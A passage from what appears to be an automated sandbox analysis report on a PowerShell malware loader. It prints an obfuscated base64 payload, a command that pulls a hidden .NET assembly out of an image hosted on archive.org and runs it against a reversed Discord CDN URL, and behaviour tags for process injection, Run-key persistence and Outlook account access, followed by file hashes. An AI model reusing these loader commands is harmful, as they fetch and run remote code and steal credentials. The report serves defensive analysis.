╏EI⬄ ⚅ ⢝ ⚱ ╏YQBz⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏Ng⬄ ⚅ ⢝ ⚱ ╏0⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏By⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏bgBn⬄ ⚅ ⢝ ⚱ ╏Cg⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bi⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cwBl⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏N⬄ ⚅ ⢝ ⚱ ╏BD⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏bQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏Ck⬄ ⚅ ⢝ ⚱ ╏Ow⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏bwBh⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏ZQBk⬄ ⚅ ⢝ ⚱ ╏EE⬄ ⚅ ⢝ ⚱ ╏cwBz⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bQBi⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏eQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D0⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏Bb⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏eQBz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏ZQBt⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏UgBl⬄ ⚅ ⢝ ⚱ ╏GY⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏bg⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏EE⬄ ⚅ ⢝ ⚱ ╏cwBz⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bQBi⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏eQBd⬄ ⚅ ⢝ ⚱ ╏Do⬄ ⚅ ⢝ ⚱ ╏OgBM⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏YQBk⬄ ⚅ ⢝ ⚱ ╏Cg⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bj⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏bQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏EI⬄ ⚅ ⢝ ⚱ ╏eQB0⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏cw⬄ ⚅ ⢝ ⚱ ╏p⬄ ⚅ ⢝ ⚱ ╏Ds⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏B0⬄ ⚅ ⢝ ⚱ ╏Hk⬄ ⚅ ⢝ ⚱ ╏c⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏PQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bv⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏QQBz⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏ZQBt⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏B5⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏RwBl⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏V⬄ ⚅ ⢝ ⚱ ╏B5⬄ ⚅ ⢝ ⚱ ╏H⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏o⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bu⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏aQBi⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏SQBP⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏S⬄ ⚅ ⢝ ⚱ ╏Bv⬄ ⚅ ⢝ ⚱ ╏G0⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏Ck⬄ ⚅ ⢝ ⚱ ╏Ow⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏G0⬄ ⚅ ⢝ ⚱ ╏ZQB0⬄ ⚅ ⢝ ⚱ ╏Gg⬄ ⚅ ⢝ ⚱ ╏bwBk⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏PQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏B5⬄ ⚅ ⢝ ⚱ ╏H⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏Ec⬄ ⚅ ⢝ ⚱ ╏ZQB0⬄ ⚅ ⢝ ⚱ ╏E0⬄ ⚅ ⢝ ⚱ ╏ZQB0⬄ ⚅ ⢝ ⚱ ╏Gg⬄ ⚅ ⢝ ⚱ ╏bwBk⬄ ⚅ ⢝ ⚱ ╏Cg⬄ ⚅ ⢝ ⚱ ╏JwBW⬄ ⚅ ⢝ ⚱ ╏EE⬄ ⚅ ⢝ ⚱ ╏SQ⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏Ck⬄ ⚅ ⢝ ⚱ ╏LgBJ⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏dgBv⬄ ⚅ ⢝ ⚱ ╏Gs⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏o⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏bgB1⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏s⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏WwBv⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏agBl⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bb⬄ ⚅ ⢝ ⚱ ╏F0⬄ ⚅ ⢝ ⚱ ╏XQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏Cg⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏m⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏1⬄ ⚅ ⢝ ⚱ ╏Dc⬄ ⚅ ⢝ ⚱ ╏NgBl⬄ ⚅ ⢝ ⚱ ╏DE⬄ ⚅ ⢝ ⚱ ╏N⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏5⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏YwBm⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏Ng⬄ ⚅ ⢝ ⚱ ╏3⬄ ⚅ ⢝ ⚱ ╏Dk⬄ ⚅ ⢝ ⚱ ╏Yg⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏O⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏1⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏MQBj⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏NQ⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏0⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏MQBi⬄ ⚅ ⢝ ⚱ ╏DI⬄ ⚅ ⢝ ⚱ ╏M⬄ ⚅ ⢝ ⚱ ╏Bm⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏Ng⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏N⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Yg⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏Zg⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏GY⬄ ⚅ ⢝ ⚱ ╏NgBm⬄ ⚅ ⢝ ⚱ ╏DU⬄ ⚅ ⢝ ⚱ ╏Mw⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DE⬄ ⚅ ⢝ ⚱ ╏YQ⬄ ⚅ ⢝ ⚱ ╏3⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏YgBh⬄ ⚅ ⢝ ⚱ ╏Dk⬄ ⚅ ⢝ ⚱ ╏PQBt⬄ ⚅ ⢝ ⚱ ╏Gg⬄ ⚅ ⢝ ⚱ ╏Jg⬄ ⚅ ⢝ ⚱ ╏4⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏YQBl⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏Yw⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏PQBz⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏Jg⬄ ⚅ ⢝ ⚱ ╏4⬄ ⚅ ⢝ ⚱ ╏DU⬄ ⚅ ⢝ ⚱ ╏Yw⬄ ⚅ ⢝ ⚱ ╏z⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏Yw⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏PQB4⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏PwB0⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏c⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏H⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Lw⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏Dc⬄ ⚅ ⢝ ⚱ ╏Mg⬄ ⚅ ⢝ ⚱ ╏1⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏O⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏3⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏x⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Mg⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏DM⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏3⬄ ⚅ ⢝ ⚱ ╏Dc⬄ ⚅ ⢝ ⚱ ╏Mg⬄ ⚅ ⢝ ⚱ ╏x⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏OQ⬄ ⚅ ⢝ ⚱ ╏1⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏1⬄ ⚅ ⢝ ⚱ ╏DE⬄ ⚅ ⢝ ⚱ ╏Mw⬄ ⚅ ⢝ ⚱ ╏5⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏M⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏4⬄ ⚅ ⢝ ⚱ ╏DE⬄ ⚅ ⢝ ⚱ ╏Mw⬄ ⚅ ⢝ ⚱ ╏z⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏3⬄ ⚅ ⢝ ⚱ ╏DI⬄ ⚅ ⢝ ⚱ ╏MQ⬄ ⚅ ⢝ ⚱ ╏v⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bu⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bQBo⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏YQB0⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏YQ⬄ ⚅ ⢝ ⚱ ╏v⬄ ⚅ ⢝ ⚱ ╏G0⬄ ⚅ ⢝ ⚱ ╏bwBj⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏c⬄ ⚅ ⢝ ⚱ ╏Bw⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏By⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏YwBz⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bj⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏Lw⬄ ⚅ ⢝ ⚱ ╏6⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏c⬄ ⚅ ⢝ ⚱ ╏B0⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏a⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏L⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏MQ⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏L⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏Qw⬄ ⚅ ⢝ ⚱ ╏6⬄ ⚅ ⢝ ⚱ ╏Fw⬄ ⚅ ⢝ ⚱ ╏U⬄ ⚅ ⢝ ⚱ ╏By⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏ZwBy⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bQBE⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏Fw⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏Cw⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏H⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏YQBk⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏YQBs⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏L⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏EE⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bk⬄ ⚅ ⢝ ⚱ ╏Ek⬄ ⚅ ⢝ ⚱ ╏bgBQ⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏bwBj⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏cwBz⬄ ⚅ ⢝ ⚱ ╏DM⬄ ⚅ ⢝ ⚱ ╏Mg⬄ ⚅ ⢝ ⚱ ╏n⬄ ⚅ ⢝ ⚱ ╏Cw⬄ ⚅ ⢝ ⚱ ╏JwBk⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏cwBh⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏aQB2⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bv⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏KQ⬄ ⚅ ⢝ ⚱ ╏p⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⬄ ⚅ ⢝ ⚱ ╏','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&b7576e1490cfd679b208a67501cc56ce4b1b20fd664420b66f2f6f5361a7aba9=mh&8daecc66=si&85c3ec66=xe?txt.ipap/2725487471022377721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','AddInProcess32','desativado'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\hwldfbhovofrtyrlbfq"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\syrvgtspjwxewmnplplejp"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\syrvgtspjwxewmnplplejp"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\syrvgtspjwxewmnplplejp"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\syrvgtspjwxewmnplplejp"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\useohmljxepigsbtuaxxmcbgw"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD58b8277c8f03c24d1f290dbe476e961d2
SHA12e13baf3a4b708277d550dc3dd1e0f99b131f78e
SHA2569af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e
SHA5127367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948
-
Filesize
100KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.1MB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB